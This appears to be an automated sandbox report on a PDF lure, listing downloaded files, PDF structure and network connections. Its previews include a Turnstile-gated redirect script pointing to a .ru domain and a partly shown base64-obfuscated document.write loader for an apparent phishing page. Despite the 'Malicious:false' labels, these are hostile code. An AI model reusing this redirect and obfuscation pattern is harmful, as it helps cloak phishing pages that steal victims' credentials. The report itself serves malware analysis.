                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                        Category:downloaded
                                                                                        Size (bytes):47692
                                                                                        Entropy (8bit):5.4016459163756165
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                        Malicious:false
                                                                                        URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with very long lines (65381), with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):444780
                                                                                        Entropy (8bit):3.122589069097315
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:rktYmG/kw9SHIvAjdF+jahktYmG/kw9SHIvAjdF+jahlrvlr8:rIYR/kw9So4ZF+cIYR/kw9So4ZF+O1S
                                                                                        MD5:5BA8CFE58E1E3CB270118DEF3858D3E2
                                                                                        SHA1:AF7416643237BAF7BD437CDF361C28DFAACE101F
                                                                                        SHA-256:7E02FCA0F490E39319632FA20B5A4473DAE8922F82A3E1E23C534D4F76FA382F
                                                                                        SHA-512:BBFEFD0B8F51A8BE92F974D0BBBAC1ED0235B126C64EA425B5F8F7A8E9ED791AE91933C2087C2A894F18188BD6A101938633A4215007A52530F3758A31B176F6
                                                                                        Malicious:false
                                                                                        URL:https://e84.zolivor.ru/OSkl/
                                                                                        Preview:<script>../* Success is not the key to happiness. Happiness is the key to success. */..if(atob("aHR0cHM6Ly9lODQuem9saXZvci5ydS9PU2tsLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1FZGdlLGNocm9tZT0xIj4NCiAgICA8bWV0YSBuYW1lPSJyb2JvdHMiIGNvbnRlbnQ9Im5vaW5kZXgsIG5vZm9sbG93Ij4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPiYjODIwMzs8L3RpdGxlPg0KPHN0eWxlPg0KYm9keSwgaHRtbCB7DQptYXJnaW46IDA7DQpwYWRkaW5nOiAwOw0KaGVpZ2h0OiAxMDAlOw0Kb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCg0KLmJhY2tncm91bmQtY29udGFpbmVyIHsNCiAgICBwb3NpdGlvbjogcmVsYXRpdmU7DQogICAgaGVpZ2h0OiAxMDAlOw0KICAgIHdpZHRoOiAxMDAlOw0KfQ0KLmJhY2tncm91bmQtY29udGFpbmVyIC5iYWNrZ3JvdW5kIHsNCiAgICBjb250ZW50OiAiIjsNCiAgICBwb3NpdGlvbjogYWJzb2x1dGU7DQ
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 56 x 51, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770306
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPl/UggHxl/k4E08up:6v/lhPKggH7Tp
                                                                                        MD5:CECF15281EEB2422804CEC25DED2B3B6
                                                                                        SHA1:32C9A127269C808B4B2A413DDA3552F670DF1EEB
                                                                                        SHA-256:07AFEFF384B151D287B996F95B3A39D0657122F96BB61CC299AA2BDDDCC6A52C
                                                                                        SHA-512:B997E62033B1B5945E2E796BBD920309370D207F9E3BFC5F5089C3150E5E586570D99C8DEEF707E4ED17F44445CF35A24C322E9244B271BF82DF401C2693A8A1
                                                                                        Malicious:false
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8f6f283fab80c461/1735028274213/xzuZuxWFN2xIUod
                                                                                        Preview:.PNG........IHDR...8...3.....M#\.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65447)
                                                                                        Category:downloaded
                                                                                        Size (bytes):89501
                                                                                        Entropy (8bit):5.289893677458563
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                        MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                        SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                        SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                        SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                        Malicious:false
                                                                                        URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                        Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):612
                                                                                        Entropy (8bit):4.988321743922674
                                                                                        Encrypted:false
                                                                                        SSDEEP:12:hPG4yvjS5SSavmmMcw2osZdr8+HskwGWuMCcf0+uNV4Gb:hPxR5SPvGYdrRWuMC2uNV4M
                                                                                        MD5:90FCE18E5EF426EA4D79AA9F3553FB96
                                                                                        SHA1:2FC864EA0F46AB0D95AC9FE00A01E4280D780FFF
                                                                                        SHA-256:59EACA076136932EC883A42164BEB703DB25C1616F2D6759A0AF2A620C170157
                                                                                        SHA-512:7AF35051E65E9D2CB330102AD3CD671E2285858DA2E0AD3BFABBEBBD5987E6BFBF449F2E42FE7C5FD0F0A50998497F1CA428EA7A8E39E6C5453D4DAA6E10D1CA
                                                                                        Malicious:false
                                                                                        URL:https://5m9sp7.naomijewelryjapan.com/
                                                                                        Preview:<!DOCTYPE html>..<html lang="en">....<head>.. <meta charset="UTF-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <title>Document</title>..<style>.. div {.. display: flex;.. align-items: center;.. justify-content: center;.. width: 90vw;.. height: 85vh;.. background-color: white;.. flex-direction: row;.. }..</style>.. <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer></script>..</head>....<body>....<div id="myWidget"></div>...... <script src="main.js"></script> ..</body>....</html>
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (47691)
                                                                                        Category:dropped
                                                                                        Size (bytes):47692
                                                                                        Entropy (8bit):5.4016459163756165
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                                        MD5:9046FDD8B20F930F537279DEDE41E747
                                                                                        SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                                        SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                                        SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                                        Malicious:false
                                                                                        Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):317
                                                                                        Entropy (8bit):4.912922782076525
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:HtW9lD+/98MPpC7T1cO1C4HodNXpKpWgLZmUemmHaOuZ9n:NWqeMQCKq87ZmHxHF89n
                                                                                        MD5:708D3E8FE42FB663A7CCA7FD0571324C
                                                                                        SHA1:D141ADF511FC44DC54A8BB8460A90FF50563DC1F
                                                                                        SHA-256:B7361217A99CB70D02F2D137E7DF2C11BAB52DEE8F774D6A340708A173502A19
                                                                                        SHA-512:644FC42AC465A958BCE1DAB64D11B08BC40A0A96E3B55B4D724DCC417924F2558EDCCCB8B24C460496A089025CF3B5BEA9C9965FD0183AC60D00825B2A615B86
                                                                                        Malicious:false
                                                                                        Preview:window.onloadTurnstileCallback = function () {.. turnstile.render('#myWidget', {.. sitekey: '0x4AAAAAAA34ghPqNBRUmTxK',.. callback: function(token) {.. console.log('Challenge Success ${token}');.. window.location.href = "https://e84.zolivor.ru/OSkl/";.. },.. });.. };
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 56 x 51, 8-bit/color RGB, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):4.068159130770306
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPl/UggHxl/k4E08up:6v/lhPKggH7Tp
                                                                                        MD5:CECF15281EEB2422804CEC25DED2B3B6
                                                                                        SHA1:32C9A127269C808B4B2A413DDA3552F670DF1EEB
                                                                                        SHA-256:07AFEFF384B151D287B996F95B3A39D0657122F96BB61CC299AA2BDDDCC6A52C
                                                                                        SHA-512:B997E62033B1B5945E2E796BBD920309370D207F9E3BFC5F5089C3150E5E586570D99C8DEEF707E4ED17F44445CF35A24C322E9244B271BF82DF401C2693A8A1
                                                                                        Malicious:false
                                                                                        Preview:.PNG........IHDR...8...3.....M#\.....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):317
                                                                                        Entropy (8bit):4.912922782076525
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:HtW9lD+/98MPpC7T1cO1C4HodNXpKpWgLZmUemmHaOuZ9n:NWqeMQCKq87ZmHxHF89n
                                                                                        MD5:708D3E8FE42FB663A7CCA7FD0571324C
                                                                                        SHA1:D141ADF511FC44DC54A8BB8460A90FF50563DC1F
                                                                                        SHA-256:B7361217A99CB70D02F2D137E7DF2C11BAB52DEE8F774D6A340708A173502A19
                                                                                        SHA-512:644FC42AC465A958BCE1DAB64D11B08BC40A0A96E3B55B4D724DCC417924F2558EDCCCB8B24C460496A089025CF3B5BEA9C9965FD0183AC60D00825B2A615B86
                                                                                        Malicious:false
                                                                                        URL:https://5m9sp7.naomijewelryjapan.com/main.js
                                                                                        Preview:window.onloadTurnstileCallback = function () {.. turnstile.render('#myWidget', {.. sitekey: '0x4AAAAAAA34ghPqNBRUmTxK',.. callback: function(token) {.. console.log('Challenge Success ${token}');.. window.location.href = "https://e84.zolivor.ru/OSkl/";.. },.. });.. };
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:downloaded
                                                                                        Size (bytes):16
                                                                                        Entropy (8bit):3.5
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:H+rYn:D
                                                                                        MD5:F1C9C44E663E7E62582E3F5B236C1C72
                                                                                        SHA1:E142F3A0C2D1CDF175A5C3AF43AD66FEFE208B1F
                                                                                        SHA-256:D843E67FBFA1F5CB0024062861EE26860C5A866F80755CF39B3465459A8538B9
                                                                                        SHA-512:19FE62CB9D884BB3424C51DD15E74EB22E5A639BABF8398BACEBB781862296FA0D7AEE39C88CB9C7AF5791FD58830AC3433F5C6BD94B1BA3912AB33151E93452
                                                                                        Malicious:false
                                                                                        URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAkzM1yxBESyFhIFDTcwqTA=?alt=proto
                                                                                        Preview:CgkKBw03MKkwGgA=
                                                                                        File type:PDF document, version 1.4, 1 pages
                                                                                        Entropy (8bit):7.830612226944333
                                                                                        TrID:
                                                                                        • Adobe Portable Document Format (5005/1) 100.00%
                                                                                        File name:eCompleted_419z.pdf
                                                                                        File size:27'568 bytes
                                                                                        MD5:ebca5b55f1c16010777c928c6a4d0c19
                                                                                        SHA1:92f6a8adaeb45ab8defb4362f6373eed170f0e88
                                                                                        SHA256:56a416833aea8cbd27cd1ec3115cbc9f0e3f7cd90ea767f0f6fe68fd9dba0084
                                                                                        SHA512:dc782c994cd9e488c6480927874c38656bb65d536926d87a7bf8d50d1dc48b8836ac206c40eb1ef70886fd5d5d37ea0c129063ce5f8272a655acb7cb4bbd2013
                                                                                        SSDEEP:768:MHQ7YBPvgAj4iQWdHVZ3DF/WLEny1d0PWwXY:SQEWJFWdHnx/WLEn2m+CY
                                                                                        TLSH:F3C2BF6BD5885C1DECC3C7955025788E04BDF1034AE62AD329340D8ABE14EA4DD326EF
                                                                                        File Content Preview:%PDF-1.4.%.....1 0 obj.<<./Title ()./Creator (...w.k.h.t.m.l.t.o.p.d.f. .0...1.2...5)./Producer (...Q.t. .5...1.2...8)./CreationDate (D:20241223210615Z).>>.endobj.2 0 obj.<<./Type /Catalog./Pages 3 0 R.>>.endobj.4 0 obj.<<./Type /ExtGState./SA true./SM 0.
                                                                                        Icon Hash:62cc8caeb29e8ae0

                                                                                        General

                                                                                        Header:%PDF-1.4
                                                                                        Total Entropy:7.830612
                                                                                        Total Bytes:27568
                                                                                        Stream Entropy:7.953711
                                                                                        Stream Bytes:23541
                                                                                        Entropy outside Streams:5.160054
                                                                                        Bytes outside Streams:4027
                                                                                        Number of EOF found:1
                                                                                        Bytes after EOF:
                                                                                        NameCount
                                                                                        obj29
                                                                                        endobj29
                                                                                        stream9
                                                                                        endstream9
                                                                                        xref1
                                                                                        trailer1
                                                                                        startxref1
                                                                                        /Page1
                                                                                        /Encrypt0
                                                                                        /ObjStm0
                                                                                        /URI2
                                                                                        /JS0
                                                                                        /JavaScript0
                                                                                        /AA0
                                                                                        /OpenAction0
                                                                                        /AcroForm0
                                                                                        /JBIG2Decode0
                                                                                        /RichMedia0
                                                                                        /Launch0
                                                                                        /EmbeddedFile0

                                                                                        Image Streams

                                                                                        IDDHASHMD5Preview
                                                                                        7ccb62969696986cc42db1b9d75d3b321a5ae572e6ad48a4a
                                                                                        9ccb62969696986cc91060735c78e5b8b609c39754184e8d3
                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Dec 24, 2024 09:17:17.544189930 CET49675443192.168.2.4173.222.162.32
                                                                                        Dec 24, 2024 09:17:30.268116951 CET49672443192.168.2.4173.222.162.32
                                                                                        Dec 24, 2024 09:17:30.268160105 CET44349672173.222.162.32192.168.2.4
                                                                                        Dec 24, 2024 09:17:35.948086977 CET4972380192.168.2.4199.232.210.172
                                                                                        Dec 24, 2024 09:17:36.068109989 CET8049723199.232.210.172192.168.2.4
                                                                                        Dec 24, 2024 09:17:36.068196058 CET4972380192.168.2.4199.232.210.172
                                                                                        Dec 24, 2024 09:17:42.238625050 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.238672972 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:42.238842964 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.239181995 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.239212036 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:42.239744902 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.239825010 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:42.239905119 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.240070105 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:42.240103960 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.493901968 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.494180918 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.494205952 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.495240927 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.495310068 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.497080088 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.497155905 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.497407913 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.497417927 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.505976915 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.506205082 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.506221056 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.507709980 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.507781982 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.508766890 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.508963108 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.546212912 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.561856985 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:43.561866999 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:43.607494116 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.497692108 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.498634100 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.498764992 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.511025906 CET49756443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.511053085 CET44349756192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.518479109 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.559385061 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.663476944 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:44.663542032 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.663613081 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:44.663892984 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:44.663908958 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.873799086 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.874368906 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:44.874532938 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.875380039 CET49755443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:44.875406027 CET44349755192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.018034935 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:45.018100977 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.018254042 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:45.018429995 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:45.018450975 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.828993082 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:45.829050064 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.829122066 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:45.833072901 CET49759443192.168.2.4172.217.21.36
                                                                                        Dec 24, 2024 09:17:45.833098888 CET44349759172.217.21.36192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.876513004 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.876737118 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:45.876754999 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.877824068 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.877899885 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:45.878950119 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:45.879014015 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.879111052 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:45.879121065 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:45.919487953 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.265306950 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.265636921 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.265670061 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.266573906 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.266654015 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.266968012 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.267024994 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.267107010 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.307341099 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.313540936 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.313584089 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.313595057 CET44349758192.185.57.26192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.313610077 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.313671112 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.314150095 CET49757443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.314171076 CET44349757104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.315689087 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.315783978 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.315867901 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.316072941 CET49760443192.168.2.4104.18.94.41
                                                                                        Dec 24, 2024 09:17:46.316114902 CET44349760104.18.94.41192.168.2.4
                                                                                        Dec 24, 2024 09:17:46.361679077 CET49758443192.168.2.4192.185.57.26
                                                                                        Dec 24, 2024 09:17:46.722732067 CET44349758192.185.57.26192.168.2.4
